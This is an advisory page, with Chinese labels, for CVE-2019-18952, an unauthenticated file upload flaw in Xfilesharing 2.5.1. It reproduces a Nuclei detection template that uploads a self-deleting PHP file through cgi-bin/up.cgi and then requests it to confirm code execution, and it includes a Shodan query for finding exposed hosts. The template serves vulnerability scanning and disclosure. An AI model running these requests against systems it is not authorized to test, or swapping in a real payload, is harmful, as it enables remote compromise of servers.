CVE-2019-18952: Xfilesharing 2.5.1 - Arbitrary File Upload

日期: 2025-08-01 | 影响软件: Xfilesharing 2.5.1 | POC: 已公开

漏洞描述

SibSoft Xfilesharing through 2.5.1 allows cgi-bin/up.cgi arbitrary file upload.This can be combined with CVE-2019-18951 to achieve remote code execution via a .html file, containing short codes, that is served over HTTP.

PoC代码[已公开]

id: CVE-2019-18952

info:
  name: Xfilesharing 2.5.1 - Arbitrary File Upload
  author: daffainfo
  severity: critical
  description: |
    SibSoft Xfilesharing through 2.5.1 allows cgi-bin/up.cgi arbitrary file upload.This can be combined with CVE-2019-18951 to achieve remote code execution via a .html file, containing short codes, that is served over HTTP.
  impact:
    Attackers can upload malicious files and execute arbitrary code remotely, leading to full system compromise.
  reference:
    - https://www.exploit-db.com/exploits/47659
    - https://gist.github.com/pak0s/af9f640170aed335fdf6d110d468dbce
    - https://nvd.nist.gov/vuln/detail/CVE-2019-18952
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-18952
    cwe-id: CWE-434
    epss-score: 0.84694
    epss-percentile: 0.99284
    cpe: cpe:2.3:a:sibsoft:xfilesharing:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: sibsoft
    product: xfilesharing
    shodan-query: html:"/?op=registration" "OpenSSL"
  tags: cve,cve2019,sibsoft,xfilesharing,rce,file-upload,intrusive,vkev,vuln

flow: http(1) && http(2)

variables:
  num: "999999999"
  path: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /cgi-bin/up.cgi HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337

        -----------------------------5825462663702204104870787337
        Content-Disposition: form-data; name="sid"

        {{path}}
        -----------------------------5825462663702204104870787337
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: application/php

        <?php
        echo md5('{{num}}');
        unlink(__FILE__);
        ?>
        -----------------------------5825462663702204104870787337--

    matchers:
      - type: word
        words:
          - "<OK>"
        internal: true

  - raw:
      - |
        GET /cgi-bin/temp/{{path}}/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "{{md5(num)}}"
# digest: 4a0a004730450221009597e421fd26f91dc9b04ce0a9f9ae5c3a0db17215b7bc67b2903be6e437777c022050a887da69c68745936a4c96e6d9f52336354422d2a84b32c76c0f6843854b67:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2019/CVE-2019-18952.yaml